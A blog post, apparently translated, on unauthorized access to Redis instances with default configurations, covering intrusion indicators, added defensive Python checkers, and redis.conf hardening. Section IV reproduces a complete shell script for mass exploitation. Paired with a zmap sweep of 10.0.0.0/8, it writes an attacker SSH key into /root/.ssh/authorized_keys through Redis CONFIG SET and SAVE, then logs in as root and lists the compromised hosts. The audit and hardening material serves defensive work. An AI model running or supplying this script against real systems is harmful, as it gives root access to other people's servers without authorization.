I. Preface

Recently, while assessing the security exposure of our intranet, I wrote a small scanning script. The statistics from that scan showed that 60% of intranet hosts with the Redis port 6379 open were in a dangerous, exploitable state, all because of the default configuration.
Since most developers in our community use Redis, we are sharing this so that you can check your own company's intranet.

II. Vulnerability introduction
By default Redis binds to 0.0.0.0:6379, which exposes the Redis service to every network the host is attached to. If authentication is not enabled, anyone who can reach the target server can access Redis without authorization and read its data. An attacker with such unauthorized access can use Redis's own commands to write an SSH public key onto the Redis server's filesystem, and can then log in to the target server directly with the corresponding private key.
Intrusion characteristics: FLUSHALL may have been executed against Redis, emptying the whole database; a new key named crackit (the name used by the command sequence circulating on the web) has been created whose value is an SSH public key; and a new or modified authorized_keys file appears under /root/.ssh, which is actually a Redis-generated DB file (an RDB dump) containing the public key above.
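To help check a host for the indicators just listed, here is an added example (my own code, not from the original post or from the yyfexploit tool): it inspects the raw bytes of an authorized_keys file for the RDB magic and an embedded SSH key, and flags a crackit key in a keyspace listing. The sample file contents and the function names are constructed assumptions.

```python
# Added example, not code from the original post: a defender-side check for the
# intrusion indicators described above. It inspects the raw bytes of an
# authorized_keys file (is it really a Redis RDB dump? does it embed an SSH key?)
# and looks for the 'crackit' key name in a keyspace listing. All sample data is
# constructed for this demonstration; the function names are my own.
import re

RDB_MAGIC = b"REDIS"  # every RDB dump starts with "REDIS" followed by a 4-digit version
SSH_KEY_RE = re.compile(
    rb"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+) ([A-Za-z0-9+/=]{20,})"
)


def inspect_authorized_keys(data: bytes) -> dict:
    """Classify the raw contents of an authorized_keys file.

    A legitimate authorized_keys is plain text, one key per line. One written by
    Redis (CONFIG SET dir/dbfilename followed by SAVE) is an RDB dump: it starts
    with the RDB magic, contains binary opcode bytes, and the key material sits
    inside a string value.
    """
    is_rdb = data.startswith(RDB_MAGIC)
    rdb_version = data[5:9].decode("ascii", "replace") if is_rdb else None
    # NUL and the RDB opcodes 0xFE (SELECTDB) / 0xFF (EOF) never appear in a hand-written file
    has_binary = any(b in (0x00, 0xFE, 0xFF) for b in data)
    keys = [(kind.decode(), blob.decode()[:12] + "...") for kind, blob in SSH_KEY_RE.findall(data)]
    return {
        "is_rdb_dump": is_rdb,
        "rdb_version": rdb_version,
        "has_binary_bytes": has_binary,
        "embedded_keys": keys,
        "mentions_crackit": b"crackit" in data.lower(),
        "suspicious": is_rdb or has_binary,
    }


def suspicious_keys(keyspace) -> list:
    """Return names from a KEYS/SCAN listing that match the known indicator (case-insensitive)."""
    return [k for k in keyspace if k.lower() == "crackit"]


# Constructed samples (not real captures): a normal file, and a Redis-written one.
SAMPLE_CLEAN = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKey0123456789abcdef admin@bastion\n"
SAMPLE_DUMP = (
    b"REDIS0006"                         # RDB magic + version
    b"\xfe\x00"                          # SELECTDB 0
    b"\x00\x07crackit"                   # string key named 'crackit'
    b"\x4c\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDconstructedKeyMaterial0123456789== yyf\n\n"
    b"\xff"                              # EOF opcode
)

if __name__ == "__main__":
    for name, blob in (("clean", SAMPLE_CLEAN), ("dump", SAMPLE_DUMP)):
        print(name, inspect_authorized_keys(blob))
    print(suspicious_keys(["session:1", "crackit", "CRACKIT"]))
```

In practice you would feed it the bytes of /root/.ssh/authorized_keys and the output of a SCAN over the instance; a file that starts with the RDB magic is the strongest single indicator, since no legitimate tool writes authorized_keys that way.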

III. Fix recommendations

1. Disable some high-risk commands
Modify the redis.conf file and add:
    rename-command FLUSHALL ""
    rename-command CONFIG ""
    rename-command EVAL ""
This prevents a remote client from changing the DB file location, which is the step the attack above depends on.

2. Run the Redis service with low privileges
Create a separate user and home directory for the Redis service, and configure that user so it cannot log in.

3. Add password authentication to Redis
Modify the redis.conf file and add:
    requirepass MyPassword

4. Prohibit external network access to Redis
Modify the redis.conf file and add or change:
    bind 127.0.0.1
This makes the Redis service reachable only from the local host.
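As an added example, not from the original post, here is a Python audit of a redis.conf against the four recommendations above (renamed high-risk commands, non-root service user, requirepass, loopback bind). The sample configurations and the function names are my own; the running user is passed in as a parameter because it is not a redis.conf setting.

```python
# Added example, not part of the original post: audit a redis.conf against the
# four hardening recommendations above (renamed high-risk commands, low-privilege
# service user, requirepass, bind to loopback). Recommendation 2 is a property of
# the running process rather than of redis.conf, so it is passed in as
# `process_user`. The configuration texts and function names are my own.
import shlex

HIGH_RISK_COMMANDS = ("flushall", "config", "eval")
LOOPBACK = {"127.0.0.1", "::1"}


def parse_redis_conf(text: str) -> dict:
    """Map each active directive (lower-cased) to the list of argument lists seen for it.

    redis.conf is 'directive arg arg ...' per line; '#' lines are comments and
    arguments may be double-quoted (e.g. rename-command CONFIG ""), which shlex handles.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        if parts:
            conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text: str, process_user: str = "root") -> list:
    """Return a list of findings; an empty list means all four recommendations are met."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. High-risk commands must be renamed to "" (i.e. disabled).
    disabled = {a[0].lower() for a in conf.get("rename-command", []) if len(a) == 2 and a[1] == ""}
    for cmd in HIGH_RISK_COMMANDS:
        if cmd not in disabled:
            findings.append(f'{cmd.upper()} still enabled; add: rename-command {cmd.upper()} ""')

    # 2. The service should not run as root.
    if process_user == "root":
        findings.append("redis-server runs as root; create a dedicated no-login user")

    # 3. Password authentication must be configured (last requirepass line wins).
    pw = conf.get("requirepass", [])
    if not pw or not pw[-1] or pw[-1][0] == "":
        findings.append("requirepass not set; unauthenticated clients are accepted")

    # 4. Only loopback addresses may be bound; no bind line means 0.0.0.0.
    binds = conf.get("bind", [])
    addrs = binds[-1] if binds else []
    if not addrs:
        findings.append("no bind directive; Redis listens on 0.0.0.0 (all interfaces)")
    else:
        exposed = [a for a in addrs if a not in LOOPBACK]
        if exposed:
            findings.append(f"bind exposes non-loopback address(es) {exposed}; use: bind 127.0.0.1")
    return findings


# Constructed examples: a default-style config and one with the four fixes applied.
DEFAULT_CONF = """# constructed: looks like a stock redis.conf
# bind 127.0.0.1
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

HARDENED_CONF = """bind 127.0.0.1
port 6379
requirepass MyPassword
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
"""

if __name__ == "__main__":
    for label, conf, user in (("default", DEFAULT_CONF, "root"), ("hardened", HARDENED_CONF, "redis")):
        print(label, audit_redis_conf(conf, process_user=user) or ["OK"])
```

Run it against each instance's redis.conf together with the user shown by ps for redis-server; the stock configuration produces six findings, one per missing fix, and the hardened one produces none.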

IV. Scan tool

1. Usage instructions
# Taking Ubuntu as an example
su
# Requirements
apt-get install redis-server expect zmap
git clone https://github.com/qingxp9/yyfexploit
cd yyfexploit/redis
# Scan port 6379
# To scan the intranet, comment out the blacklist-file line in /etc/zmap/zmap.conf
zmap -p 6379 10.0.0.0/8 -B 10m -o ip.txt
# Usage
./redis.sh ip.txt
Finally, several .txt files are generated to record the results:
runasroot.txt: Redis has no authentication and runs as root
noauth.txt: Redis has no authentication but runs as a normal user
rootshell.txt: the public key has been written and you can log in directly as root, like this:
ssh -i id_rsa root@x.x.x.x

2. Tool source code
The code is pasted directly below; experts, please go easy on it.
#!/bin/sh
if [ $# -eq 1 ]
then
    ip_list=$1

    ##create id_rsa
    echo "****************************************create id_rsa file"
    expect -c "
    spawn ssh-keygen -t rsa -f id_rsa -C \"yyf\"
    expect {
        \"*passphrase):\" {
            exp_send \"\r\"
            exp_continue
        }
        \"*again:\" {
            exp_send \"\r\"
        }
        \"*y/n)?\" {
            exp_send \"n\r\"
        }
    }
    expect eof
    "
    echo "\n\n************************************Attack Targets"
    touch noauth.txt runasroot.txt rootshell.txt haveauth.txt
    i=0
    cat $ip_list |
    while read ip
    do
        i=`expr $i + 1`
        #write id_rsa.pub to remote
        echo "*****${i}***connect to remote ${ip} redis"
        expect -c "
        set timeout 3
        spawn redis-cli -h $ip config set dir /root/.ssh/
        expect {
            \"OK\" {exit 0}
            \"ERR Changing directory: Permission denied\" {exit 1}
            timeout {exit 2}
            \"(error) NOAUTH Authentication required\" {exit 3}
        }
        "
        case $? in
            0)
                echo "run redis as root"
                echo $ip >> noauth.txt
                echo $ip >> runasroot.txt
                ;;
            1)
                echo "not run redis as root\n\n\n"
                echo $ip >> noauth.txt
                continue
                ;;
            2)
                echo "connect timeout\n\n\n"
                continue
                ;;
            3)
                echo "with auth\n\n\n"
                echo $ip >> haveauth.txt
                continue
                ;;
        esac
        (echo -e "\n"; cat id_rsa.pub; echo -e "\n") > foo.txt
        cat foo.txt | redis-cli -h $ip -x set 1
        redis-cli -h $ip config set dir /root/.ssh/
        redis-cli -h $ip config set dbfilename "authorized_keys"
        redis-cli -h $ip save
        #login test
        echo "#try to login"
        expect -c "
        set timeout 5
        spawn ssh -i id_rsa root@$ip echo \"yyf\"
        expect {
            \"*yes/no\" {send \"yes\n\"}
            \"*password\" {send \"\003\"; exit 1}
            \"yyf\" {exit 0}
            timeout {exit 2}
        }
        exit 4
        "
        exitcode=$?
        if [ $exitcode -eq 0 ]
        then
            echo "---------------${ip} is get root shell"
            echo $ip >> rootshell.txt
        fi
        echo "\n\n\n"
    done
    echo "##########Final count##########"
    wc -l $ip_list
    echo "----------"
    wc -l noauth.txt
    wc -l runasroot.txt
    wc -l rootshell.txt
    echo "----------"
    wc -l haveauth.txt
else
    echo "usage: ./redis.sh ip.txt"
fi

V. Related references
http://zone.wooyun.org/content/23858
https://blog.islandzero.net/2015/11/11/redis-crackit/
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
If the code is not properly written, look